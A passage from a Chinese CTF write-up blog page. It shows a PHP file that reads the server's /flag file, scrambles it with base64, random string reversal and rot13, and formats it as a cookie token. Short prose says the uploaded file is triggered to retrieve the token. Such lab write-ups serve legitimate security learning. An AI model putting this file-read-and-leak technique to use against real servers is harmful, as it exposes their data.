<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">echo &quot;Hello, world!&quot;;</span><br><span class="line"></span><br><span class="line">$flag = base64_encode(file_get_contents(&quot;/flag&quot;));</span><br><span class="line">$hahahahahaha = &#x27;&#x27;;</span><br><span class="line">foreach (str_split($flag, 10) as $part) &#123;</span><br><span class="line">  if (rand(0, 1)) &#123;</span><br><span class="line">    $part = strrev($part);</span><br><span class="line">  &#125; else &#123;</span><br><span class="line">    $part = str_rot13($part);</span><br><span class="line">  &#125;</span><br><span class="line">  $hahahahahaha .= $part;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$GLOBALS[&#x27;ThURSDAY&#x27;] = $hahahahahaha;</span><br><span class="line">function code($x) &#123;</span><br><span class="line">  return &quot;Cookie: token=&quot; . base64_encode($x);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><img src="D:\huchuhao\Typora\images\image-20260102221542393.png" alt="image-20260102221542393"></p>
<p>上传 PHP 文件后的二次利用请求，核心是触发<code>crazy.php</code>执行并获取关键数据，数据中的token就是混淆后的 flag 的 Base64 编码</p>
<p>写一个脚本解密token</p>

    </div>
    
    
    
    
    
      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/ctf/" rel="tag"># ctf</a>
          </div>
    
        

    
        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/01/22/%E6%B5%8B%E8%AF%952/" rel="prev" title="测试2">
      <i class="fa fa-chevron-left"></i> 测试2
    </a></div>
      <div class="post-nav-item">
    <a href="/2026/01/22/%E6%B5%8B%E8%AF%953/" rel="next" title="测试3">
      测试3 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#week1"><span class="nav-number">2.</span> <span class="nav-text">week1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#web"><span class="nav-number">2.1.</span> <span class="nav-text">web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#multi-headach3"><span class="nav-number">2.1.1.</span> <span class="nav-text">multi-headach3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#strange-login"><span class="nav-number">2.1.2.</span> <span class="nav-text">strange_login</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%AB%E7%AC%91%EF%BC%8C%E4%BD%A0%E4%B9%9F%E8%BF%87%E4%B8%8D%E4%BA%86%E7%AC%AC%E4%BA%8C%E5%85%B3"><span class="nav-number">2.1.3.</span> <span class="nav-text">别笑，你也过不了第二关</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%87%E5%AE%99%E7%9A%84%E4%B8%AD%E5%BF%83%E6%98%AF-PHP"><span class="nav-number">2.1.4.</span> <span class="nav-text">宇宙的中心是 PHP</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%88%91%E7%9C%9F%E5%BE%97%E6%8E%A7%E5%88%B6%E4%BD%A0%E4%BA%86"><span class="nav-number">2.1.5.</span> <span class="nav-text">我真得控制你了</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%BB%91%E5%AE%A2%E5%B0%8F-W-%E7%9A%84%E6%95%85%E4%BA%8B%EF%BC%881%EF%BC%89"><span class="nav-number">2.1.6.</span> <span class="nav-text">黑客小 W 的故事（1）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#misc"><span class="nav-number">2.2.</span> <span class="nav-text">misc</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Sign-in"><span class="nav-number">2.2.1.</span> <span class="nav-text">Sign in</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#EZ-fence"><span class="nav-number">2.2.2.</span> <span class="nav-text">EZ_fence</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Misc-%E5%9F%8E%E9%82%A6%EF%BC%9A%E5%8E%8B%E7%BC%A9%E6%9C%AF"><span class="nav-number">2.2.3.</span> <span class="nav-text">Misc 城邦：压缩术</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#OSINT%EF%BC%9A%E5%A4%A9%E7%A9%BA-belong"><span class="nav-number">2.2.4.</span> <span class="nav-text">OSINT：天空 belong</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%89%8D%E6%9C%89%E6%96%87%E5%AD%97%EF%BC%8C%E6%89%80%E4%BB%A5%E6%90%9C%E7%B4%A2%E5%BE%88%E6%9C%89%E7%94%A8"><span class="nav-number">2.2.5.</span> <span class="nav-text">前有文字，所以搜索很有用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%88%91%E4%B8%8D%E8%A6%81%E9%9D%A9%E5%91%BD%E5%A4%B1%E8%B4%A5"><span class="nav-number">2.2.6.</span> <span class="nav-text">我不要革命失败</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#week2"><span class="nav-number">3.</span> <span class="nav-text">week2</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#web-1"><span class="nav-number">3.1.</span> <span class="nav-text">web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#DD-%E5%8A%A0%E9%80%9F%E5%99%A8"><span class="nav-number">3.1.1.</span> <span class="nav-text">DD 加速器</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F-E-%E7%9A%84%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F"><span class="nav-number">3.1.2.</span> <span class="nav-text">小 E 的管理系统</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%90%9E%E7%82%B9%E5%93%A6%E6%B6%A6%E5%90%89%E5%90%83%E5%90%83%F0%9F%8D%8A"><span class="nav-number">3.1.3.</span> <span class="nav-text">搞点哦润吉吃吃🍊</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%99%BD%E5%B8%BD%E5%B0%8F-K-%E7%9A%84%E6%95%85%E4%BA%8B%EF%BC%881%EF%BC%89"><span class="nav-number">3.1.4.</span> <span class="nav-text">白帽小 K 的故事（1）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9C%9F%E7%9A%84%E6%98%AF%E7%AD%BE%E5%88%B0%E8%AF%B6"><span class="nav-number">3.1.5.</span> <span class="nav-text">真的是签到诶</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#misc-1"><span class="nav-number">3.2.</span> <span class="nav-text">misc</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Misc-%E5%9F%8E%E9%82%A6%EF%BC%9ANewKeyboard"><span class="nav-number">3.2.1.</span> <span class="nav-text">Misc 城邦：NewKeyboard</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BE%8E%E5%A6%99%E7%9A%84%E9%9F%B3%E4%B9%90"><span class="nav-number">3.2.2.</span> <span class="nav-text">美妙的音乐</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90%EF%BC%9A%E4%B8%8D%E6%95%AC%E8%80%85%E7%9A%84%E9%97%AF%E5%85%A5"><span class="nav-number">3.2.3.</span> <span class="nav-text">日志分析：不敬者的闯入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%98%9F%E6%9C%9F%E5%9B%9B%E7%9A%84%E7%8B%82%E6%83%B3"><span class="nav-number">3.2.4.</span> <span class="nav-text">星期四的狂想</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">程序元</p>
  <div class="site-description" itemprop="description">路漫漫其修远兮，吾将上下而求索。</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2025 – 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">程序元</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">90k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">1:22</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
